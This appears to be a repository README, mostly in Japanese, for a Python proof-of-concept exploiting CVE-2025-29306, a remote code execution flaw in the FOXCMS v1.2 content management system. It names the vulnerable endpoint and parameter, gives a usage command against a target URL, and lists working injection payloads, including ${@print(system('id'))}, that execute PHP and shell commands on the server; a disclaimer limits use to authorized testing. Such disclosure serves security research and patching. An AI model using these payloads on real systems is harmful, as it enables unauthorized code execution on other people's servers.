
このリポジトリには、中国のオープンソースコンテンツ管理システムである FOXCMS v1.2 に影響を及ぼすリモートコード実行(RCE)脆弱性の Python ベースの PoC が含まれています。
CVE-ID: CVE-2025-29306
影響を受けるバージョン: FOXCMS v1.2
種別: サービスパラメータインジェクション → コード実行
FOXCMS は、/images/index.html エンドポイントの id パラメータにおける安全でないパラメータ解析メカニズムを抱えています。これにより、${@print()} 式を使用したペイロードインジェクションが可能となり、PHP コードの実行に至ります。
requests ライブラリpip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
# 🔐 Legal Disclaimer
This code is for educational purposes and authorized security testing only.
Do NOT use it on systems you do not own or have permission to test.
著者 Inok009